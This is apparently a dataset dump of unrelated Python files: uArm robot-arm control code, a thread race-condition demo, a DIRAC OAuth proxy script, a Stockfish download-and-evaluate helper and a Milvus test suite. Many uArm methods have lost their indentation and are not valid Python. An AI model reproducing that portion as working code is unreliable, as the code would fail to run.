        :param wait: if True, will block the thread, until get response or timeout
        :return: True/False (firmware acknowledgement) when wait=True, else None
        """
        if relative:
            if x is None:
                x = 0.0
            if y is None:
                y = 0.0
            if z is None:
                z = 0.0
            x = str(round(x, 2))
            y = str(round(y, 2))
            z = str(round(z, 2))
            s = str(round(speed, 2))
            command = protocol.SET_POSITION_RELATIVE.format(x, y, z, s)
        else:
            if x is None or y is None or z is None:
                raise Exception('x, y, z can not be None in absolute mode')
            x = str(round(x, 2))
            y = str(round(y, 2))
            z = str(round(z, 2))
            s = str(round(speed, 2))
            command = protocol.SET_POSITION.format(x, y, z, s)
        if wait:
            serial_id, response = self.send_and_receive(command)
            # Poll until the firmware reports motion has stopped before
            # returning the acknowledgement result.
            while self.get_is_moving():
                time.sleep(0.05)
            if response is not None:
                if response[0] == protocol.OK:
                    return True
                else:
                    return False
        else:
            self.send_msg(command)
@catch_exception
def set_pump(self, on, wait=False):
"""
Control uArm Pump On or OFF
:param on: True On, False OFF
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
command = protocol.SET_PUMP.format(1 if on else 0)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_gripper(self, catch, wait=False):
"""
Turn On/Off Gripper
:param catch: True On/ False Off
:param wait: if True, will block the thread, until get response or timeout
:return:
"""
command = protocol.SET_GRIPPER.format(1 if catch else 0)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
    @catch_exception
    def set_wrist(self, angle, wait=False):
        """
        Set uArm Hand Wrist Angle. Include servo offset.
        Thin wrapper that delegates to set_servo_angle with protocol.SERVO_HAND.
        :param angle: target angle in degrees (0 - 180)
        :param wait: if True, will block the thread, until get response or timeout
        :return: True/False when wait=True, None otherwise (from set_servo_angle)
        """
        return self.set_servo_angle(protocol.SERVO_HAND, angle, wait=wait)
@catch_exception
def set_servo_angle(self, servo_number, angle, wait=False):
"""
Set uArm Servo Angle, 0 - 180 degrees, this Function will include the manual servo offset.
:param servo_number: lease reference protocol.py SERVO_BOTTOM, SERVO_LEFT, SERVO_RIGHT, SERVO_HAND
:param angle: 0 - 180 degrees
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
command = protocol.SET_SERVO_ANGLE.format(str(servo_number), str(angle))
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_buzzer(self, frequency, duration, wait=False):
"""
Turn on the uArm Buzzer
:param frequency: The frequency, in Hz
:param duration: The duration of the buzz, in seconds
:param wait: if True, will block the thread, until get response or timeout
:return:
"""
command = protocol.SET_BUZZER.format(frequency, duration)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
@catch_exception
def set_servo_attach(self, servo_number=None, move=True, wait=False):
"""
Set Servo status attach, Servo Attach will lock the servo, You can't move uArm with your hands.
:param servo_number: If None, will attach all servos, please reference protocol.py SERVO_BOTTOM, SERVO_LEFT,
SERVO_RIGHT, SERVO_HAND
:param move: if True, will move to current position immediately
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
if servo_number is not None:
if move:
pos = self.get_position()
self.set_position(pos[0], pos[1], pos[2], speed=100)
command = protocol.ATTACH_SERVO.format(servo_number)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0].startswith(protocol.OK):
return True
else:
return False
else:
self.send_msg(command)
else:
if move:
pos = self.get_position()
self.set_position(pos[0], pos[1], pos[2], speed=0)
if wait:
if self.set_servo_attach(servo_number=0, move=False, wait=True) \
and self.set_servo_attach(servo_number=1, move=False, wait=True) \
and self.set_servo_attach(servo_number=2, move=False, wait=True) \
and self.set_servo_attach(servo_number=3, move=False, wait=True):
return True
else:
return False
else:
self.set_servo_attach(servo_number=0, move=False)
self.set_servo_attach(servo_number=1, move=False)
self.set_servo_attach(servo_number=2, move=False)
self.set_servo_attach(servo_number=3, move=False)
@catch_exception
def set_servo_detach(self, servo_number=None, wait=False):
"""
Set Servo status detach, Servo Detach will unlock the servo, You can move uArm with your hands.
But move function won't be effect until you attach.
:param servo_number: If None, will detach all servos, please reference protocol.py SERVO_BOTTOM, SERVO_LEFT, SERVO_RIGHT, SERVO_HAND
:param wait: if True, will block the thread, until get response or timeout
:return: succeed True or Failed False
"""
if servo_number is not None:
command = protocol.DETACH_SERVO.format(servo_number)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0].startswith(protocol.OK):
return True
else:
return False
else:
self.send_msg(command)
else:
if wait:
if self.set_servo_detach(servo_number=0, wait=True) \
and self.set_servo_detach(servo_number=1, wait=True) \
and self.set_servo_detach(servo_number=2, wait=True) \
and self.set_servo_detach(servo_number=3, wait=True):
return True
else:
return False
else:
self.set_servo_detach(servo_number=0)
self.set_servo_detach(servo_number=1)
self.set_servo_detach(servo_number=2)
self.set_servo_detach(servo_number=3)
    @catch_exception
    def set_polar_coordinate(self, rotation, stretch, height, speed=100, wait=False):
        """
        Move in polar coordinates (rotation, stretch, height).
        :param rotation: base rotation
        :param stretch: radial stretch
        :param height: Z height
        :param speed: movement speed
        :param wait: if True, will block the thread, until get response or timeout
        :return: None (the acknowledgement-based return path is commented out below)
        """
        rotation = str(round(rotation, 2))
        stretch = str(round(stretch, 2))
        height = str(round(height, 2))
        speed = str(round(speed, 2))
        # Note: the protocol template takes stretch before rotation,
        # matching the field order get_polar() receives.
        command = protocol.SET_POLAR.format(stretch, rotation, height, speed)
        if wait:
            self.send_msg(command)
            # Busy-wait until the firmware reports motion has stopped.
            while self.get_is_moving():
                time.sleep(0.05)
        # if wait:
        #     serial_id, response = self.send_and_receive(command)
        #     if response is None:
        #         printf("No Message response {}".format(serial_id))
        #         return None
        #     if response[0].startswith(protocol.OK):
        #         return True
        #     else:
        #         return False
        else:
            self.send_msg(command)
# ---------------------------------------------------- Report Commands -----------------------------------------------#
@catch_exception
def set_report_position(self, interval, wait=False):
"""
Report Current Position in (interval) seconds.
:param interval: Seconds if 0 disable report
:param wait: if True, will block the thread, until get response or timeout
:return
"""
interval = str(round(interval, 2))
command = protocol.SET_REPORT_POSITION.format(interval)
if wait:
serial_id, response = self.send_and_receive(command)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
return True
else:
return False
else:
self.send_msg(command)
    @catch_exception
    def close_report_position(self, wait=False):
        """
        Stop the periodic position reports (interval 0 disables them).
        :param wait: if True, block until the firmware acknowledges
        :return: None
        """
        self.set_report_position(0, wait=wait)
@catch_exception
def get_report_position(self):
"""
If call `set_report_position`, uArm will report current position during the interval.
Store the position in LIFO queue.
:return: position array [x,y,z,r]
"""
item = self.__position_queue.get(self.timeout)
self.__position_queue.task_done()
return item
    def __del__(self):
        # Best-effort cleanup: close the connection when the object is
        # garbage-collected.
        self.close()
if __name__ == '__main__':
    # Hardware smoke test: connect, report the firmware version, then
    # exercise absolute/relative moves, pump and buzzer.
    uarm = UArm()
    uarm.connect()
    # Bug fix: firmware_version is a @property, so the previous
    # "uarm.firmware_version()" called the returned string -> TypeError.
    printf(uarm.firmware_version)
    uarm.set_position(10, 150, 250, speed=100)
    uarm.set_position(10, 100, 250, speed=100)
    uarm.set_position(10, 200, 250, speed=100)
    uarm.set_position(10, 150, 200, speed=100)
    uarm.set_position(10, 150, 150, speed=100)
    uarm.set_position(10, 150, 100, speed=100)
    uarm.set_position(0, 150, 150, speed=100, wait=True)
    uarm.set_position(0, 150, 50, speed=100, wait=True)
    uarm.set_pump(True)
    uarm.set_position(0, 100, 0, speed=100, relative=True, wait=True)
    uarm.set_position(0, 0, 100, speed=100, relative=True, wait=True)
    uarm.set_buzzer(1000, 0.1)
    uarm.set_position(0, -100, 0, speed=100, relative=True, wait=True)
    uarm.set_position(0, 0, -100, speed=100, relative=True, wait=True)
    uarm.set_pump(False)
    uarm.set_position(-100, 0, 0, speed=100, relative=True, wait=True)
    uarm.set_position(100, 0, 0, speed=100, relative=True, wait=True)
    # uarm.set_polar_coordinate(133,26)
    # threading.Thread(target=lambda :uarm.set_servo_attach()).start()
    # threading.Thread(target=lambda :uarm.set_servo_attach()).start()
    uarm.set_position(0, 0, 100, relative=True, speed=100, wait=True)
    uarm.set_position(0, 100, 0, relative=True, speed=100, wait=True)
    uarm.set_position(0, 0, -100, relative=True, speed=100, wait=True)
|
Thread_Race_Condition.py | # Thread Race Condition
from threading import Thread, current_thread
class Flight:
    """Toy booking model used to demonstrate a check-then-act race.

    reserve() reads available_seat and decrements it later with no lock,
    so two threads can both pass the seat check and oversell. That race
    is the point of this demo, not a bug to fix.
    """

    def __init__(self, available_seat):
        # Seats remaining; shared mutable state across threads.
        self.available_seat = available_seat

    def reserve(self, need_seat):
        """Try to allocate need_seat seats for the calling thread."""
        print("Available Seats : ", self.available_seat)
        # Check-then-act: another thread may run between this check and
        # the decrement below -- the demonstrated race window.
        if(self.available_seat >= need_seat):
            name = current_thread().name
            print(f'{need_seat} seat is allocated for {name}')
            self.available_seat -= need_seat
        else:
            print("Sorry! All seats has allocated")
# Two threads race for the single remaining seat; with unlucky timing
# both can succeed because Flight.reserve is not synchronized.
f = Flight(1)
t1 = Thread(target=f.reserve, args=(1,), name="Rahul")
t2 = Thread(target=f.reserve, args=(1,), name="Sonam")
t1.start()
t2.start()
dirac-notebook-proxy-init.py | #!/usr/bin/env python
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import glob
import time
import threading
import DIRAC
from DIRAC import gConfig, gLogger, S_OK, S_ERROR
from DIRAC.Core.Base import Script
from DIRAC.Core.Security import ProxyInfo # pylint: disable=import-error
from DIRAC.FrameworkSystem.Client import ProxyGeneration
from DIRAC.FrameworkSystem.Client.BundleDeliveryClient import BundleDeliveryClient
from DIRAC.FrameworkSystem.private.testNotebookAuth import notebookAuth
__RCSID__ = "$Id$"
class Params(ProxyGeneration.CLIParams):
    """Proxy-generation CLI parameters extended with a VOMS switch."""

    # Whether to add a VOMS extension to the generated proxy.
    addVOMSExt = False

    def setVOMSExt(self, _arg):
        """ Enable the VOMS extension flag.
        :param _arg: unused switch value
        :return: S_OK()
        """
        self.addVOMSExt = True
        return S_OK()

    def registerCLISwitches(self):
        """ Register CLI switches (base switches plus -M/--VOMS). """
        ProxyGeneration.CLIParams.registerCLISwitches(self)
        Script.registerSwitch("M", "VOMS", "Add voms extension", self.setVOMSExt)
class ProxyInit(object):
    """Obtains a user proxy via an OAuth token flow for the notebook,
    refreshes local CAs/CRLs when they look stale, and reports the result."""

    def __init__(self, piParams):
        """ Constructor
        :param piParams: parsed CLI parameters (Params instance)
        """
        self.__piParams = piParams
        self.__issuerCert = False
        self.__proxyGenerated = False
        self.__uploadedInfo = {}

    def printInfo(self):
        """ Print details of the generated proxy and of any uploaded proxies.
        """
        resultProxyInfoAsAString = ProxyInfo.getProxyInfoAsString(self.__proxyGenerated)
        if not resultProxyInfoAsAString['OK']:
            gLogger.error('Failed to get the new proxy info: %s' % resultProxyInfoAsAString['Message'])
        else:
            gLogger.notice("Proxy generated:")
            gLogger.notice(resultProxyInfoAsAString['Value'])
        if self.__uploadedInfo:
            gLogger.notice("\nProxies uploaded:")
            # Compute column widths first so the table lines up.
            maxDNLen = 0
            maxProviderLen = len('ProxyProvider')
            for userDN, data in self.__uploadedInfo.items():
                maxDNLen = max(maxDNLen, len(userDN))
                maxProviderLen = max(maxProviderLen, len(data['provider']))
            gLogger.notice(" %s | %s | %s | SupportedGroups" % ("DN".ljust(maxDNLen), "ProxyProvider".ljust(maxProviderLen),
                                                               "Until (GMT)".ljust(16)))
            for userDN, data in self.__uploadedInfo.items():
                gLogger.notice(" %s | %s | %s | " % (userDN.ljust(maxDNLen), data['provider'].ljust(maxProviderLen),
                                                     data['expirationtime'].strftime("%Y/%m/%d %H:%M").ljust(16)),
                               ",".join(data['groups']))

    def checkCAs(self):
        """ Check whether local CRLs are fresh; sync CAs/CRLs when stale.
        :return: S_OK(), or None when the check is skipped (no cert dir / no CRLs)
        """
        if "X509_CERT_DIR" not in os.environ:
            gLogger.warn("X509_CERT_DIR is unset. Abort check of CAs")
            return
        caDir = os.environ["X509_CERT_DIR"]
        # In globus standards .r0 files are CRLs. They have the same names of the CAs but diffent file extension
        searchExp = os.path.join(caDir, "*.r0")
        crlList = glob.glob(searchExp)
        if not crlList:
            gLogger.warn("No CRL files found for %s. Abort check of CAs" % searchExp)
            return
        newestFPath = max(crlList, key=os.path.getmtime)
        newestFTime = os.path.getmtime(newestFPath)
        if newestFTime > (time.time() - (2 * 24 * 3600)):
            # At least one of the files has been updated in the last 2 days
            return S_OK()
        if not os.access(caDir, os.W_OK):
            gLogger.error("Your CRLs appear to be outdated, but you have no access to update them.")
            # Try to continue anyway...
            return S_OK()
        # Update the CAs & CRLs
        gLogger.notice("Your CRLs appear to be outdated; attempting to update them...")
        bdc = BundleDeliveryClient()
        res = bdc.syncCAs()
        if not res['OK']:
            gLogger.error("Failed to update CAs", res['Message'])
        res = bdc.syncCRLs()
        if not res['OK']:
            gLogger.error("Failed to update CRLs", res['Message'])
        # Continue even if the update failed...
        return S_OK()

    def doOAuthMagic(self):
        """ Run the OAuth flow: token -> proxy -> enable CS -> refresh config.
        :return: S_OK(proxy location)/S_ERROR()
        """
        nAuth = notebookAuth(self.__piParams.diracGroup, voms=self.__piParams.addVOMSExt, proxyPath=self.__piParams.proxyLoc)
        result = nAuth.getToken()
        if not result['OK']:
            return result
        aToken = result['Value'].get('access_token')
        if not aToken:
            # NOTE(review): "resporse" is a typo in this user-facing message.
            return S_ERROR('Access token is absent in resporse.')
        result = nAuth.getProxyWithToken(aToken)
        if not result['OK']:
            return result
        result = Script.enableCS()
        if not result['OK']:
            return S_ERROR("Cannot contact CS to get user list")
        # The CA freshness check can run in the background; its result
        # is not needed for the proxy itself.
        threading.Thread(target=self.checkCAs).start()
        gConfig.forceRefresh(fromMaster=True)
        return S_OK(self.__piParams.proxyLoc)
if __name__ == "__main__":
    # Parse CLI switches, force client-side (proxy) authentication, then
    # run the OAuth flow and print the resulting proxy details.
    piParams = Params()
    piParams.registerCLISwitches()
    Script.disableCS()
    Script.parseCommandLine(ignoreErrors=True)
    DIRAC.gConfig.setOptionValue("/DIRAC/Security/UseServerCertificate", "False")
    pI = ProxyInit(piParams)
    gLogger.info(gConfig.getConfigurationTree())
    resultDoMagic = pI.doOAuthMagic()
    if not resultDoMagic['OK']:
        gLogger.fatal(resultDoMagic['Message'])
        sys.exit(1)
    pI.printInfo()
    sys.exit(0)
|
auto.py | import os
import smtplib
import stat
import sys
import zipfile
from email.message import EmailMessage
from multiprocessing import Process
from pathlib import Path
from subprocess import call, check_output
from typing import *
import evalfen
from getFile import createDir, downloadName, getAvailableNames
from send import sendFile, sendNotification
# sys.platform -> Stockfish 11 archive URL.
STOCKFISH_DOWNLOAD = {
    "win32": "https://stockfishchess.org/files/stockfish-11-win.zip",
    "linux": "https://stockfishchess.org/files/stockfish-11-linux.zip",
    "linux32": "https://stockfishchess.org/files/stockfish-11-linux.zip",
    "darwin": "https://stockfishchess.org/files/stockfish-11-mac.zip"
}
# sys.platform -> path of the extracted engine binary.
# NOTE(review): the win/linux entries already end in the "bmi2" variant
# (and ".exe" on Windows) while the darwin entry is a prefix that
# findStockfish() completes with a variant suffix -- verify the paths.
STOCKFISH_LOCATION = {
    "win32": r"stockfish\stockfish-11-win\Windows\stockfish_20011801_x64_bmi2.exe",
    "linux": "stockfish/stockfish-11-linux/Linux/stockfish_20011801_x64_bmi2",
    "linux32": "stockfish/stockfish-11-linux/Linux/stockfish_20011801_x64_bmi2",
    "darwin": "stockfish/stockfish-11-mac/Mac/stockfish-11-"
}
def promptName() -> str:
    """Ask the user for their name / GitHub username and return it."""
    answer = input("What is your name or github username? ")
    return answer
def unzip(filepath: str, resultpath: str) -> None:
    """Extract every member of the zip archive *filepath* into *resultpath*."""
    with zipfile.ZipFile(filepath, 'r') as archive:
        archive.extractall(resultpath)
def promptNames(names: List[str]) -> str:
    """Print an indexed menu of *names* and return the one the user picks."""
    for index, name in enumerate(names):
        print(index, name, sep='\t')
    choice = int(input("Which number? "))
    return names[choice]
def promptDownload() -> bool:
    """Ask whether another dataset should be downloaded (any 'y' counts as yes)."""
    answer = input("Do you need to download any other dataset?(y)es/(n)o ")
    return 'y' in answer
def downloadStockfish() -> None:
    """Download and unpack the Stockfish 11 build for this platform.

    Fetches the archive with curl, extracts it under stockfish/, marks
    the engine binary executable on non-Windows, and deletes the zip.
    """
    link = STOCKFISH_DOWNLOAD[sys.platform]
    call(["curl", "-o", "stockfish.zip", link])
    unzip("stockfish.zip", "stockfish/")
    stockfishexecutable = str(findStockfish())
    if sys.platform != "win32":
        # Bug fix: os.chmod(path, stat.S_IEXEC) replaced the whole mode,
        # leaving the file execute-only (unreadable). OR the exec bit
        # into the existing permissions instead.
        mode = os.stat(stockfishexecutable).st_mode
        os.chmod(stockfishexecutable, mode | stat.S_IEXEC)
    os.remove("stockfish.zip")
def promptNameChoice() -> Tuple[str]:
    """List datasets under data/ and return (absolute path, chosen name).

    The user may answer with an index into the listing or with a literal
    name (non-numeric input is used verbatim).
    """
    available = os.listdir("data")
    for index, name in enumerate(available):
        print(index, name, sep='\t')
    uin = input("Which would you like to start on? ")
    try:
        uin = available[int(uin)]
    except ValueError:
        pass  # not a number -> treat the raw input as the dataset name
    return str(Path(os.getcwd()) / "data" / uin), uin
def findStockfish() -> Path:
    """Return the absolute path of the platform's Stockfish binary.

    On macOS the location table holds a prefix ("...stockfish-11-") and
    the CPU-dependent variant ("bmi2" or "modern") is appended. The
    win/linux entries already name the full binary.
    """
    variant = "bmi2"
    if sys.platform == "darwin" and \
            '-3' in check_output(["/usr/sbin/sysctl", "-n", "machdep.cpu.brand_string"]).decode():
        # Older Mac CPUs (brand string containing '-3') lack BMI2.
        variant = "modern"
    location = STOCKFISH_LOCATION[sys.platform]
    # Bug fix: the suffix was appended unconditionally, producing paths
    # like "...x64_bmi2.exebmi2" on Windows/Linux. Only the darwin entry
    # is a prefix (it ends with "-") that needs the variant appended.
    if not location.endswith("-"):
        variant = ""
    return Path(os.getcwd()) / (location + variant)
def promptStockfish() -> Path:
    """Ensure a local Stockfish install exists, downloading it if needed,
    and return the path to the engine binary."""
    if "stockfish" not in os.listdir():
        print("Downloading stockfish")
        downloadStockfish()
    return findStockfish()
def getNumberThreads() -> int:
    """Number of logical CPUs available.

    NOTE(review): os.cpu_count() can return None on platforms where the
    count is undetermined, despite the int annotation -- callers assume int.
    """
    return os.cpu_count()
def progressBar(percentage: float) -> str:
    """Render *percentage* (0.0-1.0) as a 10-slot text bar plus a percent label."""
    filled = round(percentage * 10)
    bar = '#' * filled + '-' * (10 - filled)
    return "[{}]\t{:.2f}%".format(bar, percentage * 100)
def countOutput(count: int, length: int) -> None:
    """Redraw the progress bar in place (carriage return, no newline)."""
    fraction = count / length
    print(progressBar(fraction), end='\r', flush=True)
def promptThreads() -> int:
    """Ask how many worker threads to use, re-prompting until the answer
    is a number between 1 and the machine's thread count."""
    limit = getNumberThreads()
    print(f"You have {limit} threads available.")
    chosen = 0
    while not 1 <= chosen <= limit:
        try:
            chosen = int(input("How many threads would you like to use? "))
        except ValueError:
            pass  # non-numeric input: just ask again
    return chosen
def main() -> None:
    """Top-level workflow: fetch dataset and engine, then evaluate FENs.

    Runs the evaluation in a child process so Ctrl-C can stop it cleanly;
    on normal completion the result file is sent back.
    """
    createDir("dest")
    createDir("data")
    if promptDownload():
        names = list(getAvailableNames())
        names.sort()
        name = promptNames(names)
        downloadName(name)
        sendNotification(promptName(), name)
    pathToStockfish = str(promptStockfish())
    threads = promptThreads()
    source, name = promptNameChoice()
    dest = str(Path(os.getcwd()) / "dest" / name)
    # Lines already present in dest act as resume state.
    amountlines = evalfen.lineCount(dest)
    finallines = evalfen.lineCount(source)
    countOut = lambda c: countOutput(c, finallines)
    # 22 is presumably the engine search depth -- TODO confirm against evalfen.main.
    evalargs = (source, dest, 22, threads, amountlines, pathToStockfish, countOut)
    evaluate = Process(target=evalfen.main, args=evalargs)
    evaluate.start()
    print("Control c to quit")
    try:
        evaluate.join()
        print(dest)
        sendFile(promptName(), dest)
    except KeyboardInterrupt:
        # Interrupted: stop the worker but keep the partial dest file
        # so a later run can resume.
        evaluate.terminate()
        print("Done for now")
# Script entry point.
if __name__ == "__main__":
    main()
|
test_mix.py | import pdb
import copy
import pytest
import threading
import datetime
import logging
from time import sleep
from multiprocessing import Process
import sklearn.preprocessing
from milvus import IndexType, MetricType
from utils import *
# Shared test fixtures for the mixed-workload Milvus tests.
dim = 128  # vector dimensionality
index_file_size = 10
table_id = "test_mix"
add_interval_time = 2
# 10k random vectors, L2-normalized so both L2 and IP metrics behave sensibly.
vectors = gen_vectors(10000, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
top_k = 1
nprobe = 1
epsilon = 0.001
index_params = {'index_type': IndexType.IVFLAT, 'nlist': 16384}
class TestMixBase:
    """Mixed-workload Milvus tests: concurrent operations and a
    many-tables scenario covering both metric types and several index types."""

    # disable
    def _test_search_during_createIndex(self, args):
        """Disabled test: search from one process while another keeps adding vectors."""
        loops = 10000
        table = gen_unique_str()
        query_vecs = [vectors[0], vectors[1]]
        uri = "tcp://%s:%s" % (args["ip"], args["port"])
        id_0 = 0; id_1 = 0
        milvus_instance = get_milvus(args["handler"])
        milvus_instance.connect(uri=uri)
        milvus_instance.create_table({'table_name': table,
                                      'dimension': dim,
                                      'index_file_size': index_file_size,
                                      'metric_type': MetricType.L2})
        for i in range(10):
            status, ids = milvus_instance.add_vectors(table, vectors)
            # logging.getLogger().info(ids)
            if i == 0:
                id_0 = ids[0]; id_1 = ids[1]

        def create_index(milvus_instance):
            logging.getLogger().info("In create index")
            status = milvus_instance.create_index(table, index_params)
            logging.getLogger().info(status)
            status, result = milvus_instance.describe_index(table)
            logging.getLogger().info(result)

        def add_vectors(milvus_instance):
            logging.getLogger().info("In add vectors")
            status, ids = milvus_instance.add_vectors(table, vectors)
            logging.getLogger().info(status)

        def search(milvus_instance):
            logging.getLogger().info("In search vectors")
            for i in range(loops):
                status, result = milvus_instance.search_vectors(table, top_k, nprobe, query_vecs)
                logging.getLogger().info(status)
                assert result[0][0].id == id_0
                assert result[1][0].id == id_1

        # NOTE(review): despite the method name, create_index is never
        # scheduled below and p_search is never joined -- presumably why
        # the test is disabled; confirm the intended workload.
        milvus_instance = get_milvus(args["handler"])
        milvus_instance.connect(uri=uri)
        p_search = Process(target=search, args=(milvus_instance, ))
        p_search.start()
        milvus_instance = get_milvus(args["handler"])
        milvus_instance.connect(uri=uri)
        p_create = Process(target=add_vectors, args=(milvus_instance, ))
        p_create.start()
        p_create.join()

    @pytest.mark.level(2)
    def test_mix_multi_tables(self, connect):
        '''
        target: test functions with multiple tables of different metric_types and index_types
        method: create 60 tables which 30 are L2 and the other are IP, add vectors into them
            and test describe index and search
        expected: status ok
        '''
        nq = 10000
        nlist= 16384
        table_list = []
        idx = []
        #create table and add vectors
        # Tables 0-29 use L2; for each we remember the ids of vectors 0/10/20
        # so the search phase can verify hits per table.
        for i in range(30):
            table_name = gen_unique_str('test_mix_multi_tables')
            table_list.append(table_name)
            param = {'table_name': table_name,
                     'dimension': dim,
                     'index_file_size': index_file_size,
                     'metric_type': MetricType.L2}
            connect.create_table(param)
            status, ids = connect.add_vectors(table_name=table_name, records=vectors)
            idx.append(ids[0])
            idx.append(ids[10])
            idx.append(ids[20])
            assert status.OK()
        # Tables 30-59 repeat the setup with the IP metric.
        for i in range(30):
            table_name = gen_unique_str('test_mix_multi_tables')
            table_list.append(table_name)
            param = {'table_name': table_name,
                     'dimension': dim,
                     'index_file_size': index_file_size,
                     'metric_type': MetricType.IP}
            connect.create_table(param)
            status, ids = connect.add_vectors(table_name=table_name, records=vectors)
            idx.append(ids[0])
            idx.append(ids[10])
            idx.append(ids[20])
            assert status.OK()
        # time presumably comes from "from utils import *" (no direct
        # "import time" above) -- TODO verify.
        time.sleep(2)
        #create index
        # Per metric: tables 0-9 FLAT, 10-19 IVFLAT, 20-29 IVF_SQ8.
        for i in range(10):
            index_params = {'index_type': IndexType.FLAT, 'nlist': nlist}
            status = connect.create_index(table_list[i], index_params)
            assert status.OK()
            status = connect.create_index(table_list[30 + i], index_params)
            assert status.OK()
            index_params = {'index_type': IndexType.IVFLAT, 'nlist': nlist}
            status = connect.create_index(table_list[10 + i], index_params)
            assert status.OK()
            status = connect.create_index(table_list[40 + i], index_params)
            assert status.OK()
            index_params = {'index_type': IndexType.IVF_SQ8, 'nlist': nlist}
            status = connect.create_index(table_list[20 + i], index_params)
            assert status.OK()
            status = connect.create_index(table_list[50 + i], index_params)
            assert status.OK()
        #describe index
        for i in range(10):
            status, result = connect.describe_index(table_list[i])
            logging.getLogger().info(result)
            assert result._nlist == 16384
            assert result._table_name == table_list[i]
            assert result._index_type == IndexType.FLAT
            status, result = connect.describe_index(table_list[10 + i])
            logging.getLogger().info(result)
            assert result._nlist == 16384
            assert result._table_name == table_list[10 + i]
            assert result._index_type == IndexType.IVFLAT
            status, result = connect.describe_index(table_list[20 + i])
            logging.getLogger().info(result)
            assert result._nlist == 16384
            assert result._table_name == table_list[20 + i]
            assert result._index_type == IndexType.IVF_SQ8
            status, result = connect.describe_index(table_list[30 + i])
            logging.getLogger().info(result)
            assert result._nlist == 16384
            assert result._table_name == table_list[30 + i]
            assert result._index_type == IndexType.FLAT
            status, result = connect.describe_index(table_list[40 + i])
            logging.getLogger().info(result)
            assert result._nlist == 16384
            assert result._table_name == table_list[40 + i]
            assert result._index_type == IndexType.IVFLAT
            status, result = connect.describe_index(table_list[50 + i])
            logging.getLogger().info(result)
            assert result._nlist == 16384
            assert result._table_name == table_list[50 + i]
            assert result._index_type == IndexType.IVF_SQ8
        #search
        # idx holds three expected ids per table, in creation order.
        query_vecs = [vectors[0], vectors[10], vectors[20]]
        for i in range(60):
            table = table_list[i]
            status, result = connect.search_vectors(table, top_k, nprobe, query_vecs)
            assert status.OK()
            assert len(result) == len(query_vecs)
            for j in range(len(query_vecs)):
                assert len(result[j]) == top_k
            for j in range(len(query_vecs)):
                assert check_result(result[j], idx[3 * i + j])
def check_result(result, id):
    """Return True when *id* appears among the top hits of *result*.

    For result lists of five or more hits only the first five are
    considered; shorter lists are scanned in full.
    """
    candidates = result[:5] if len(result) >= 5 else result
    return id in [hit.id for hit in candidates]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.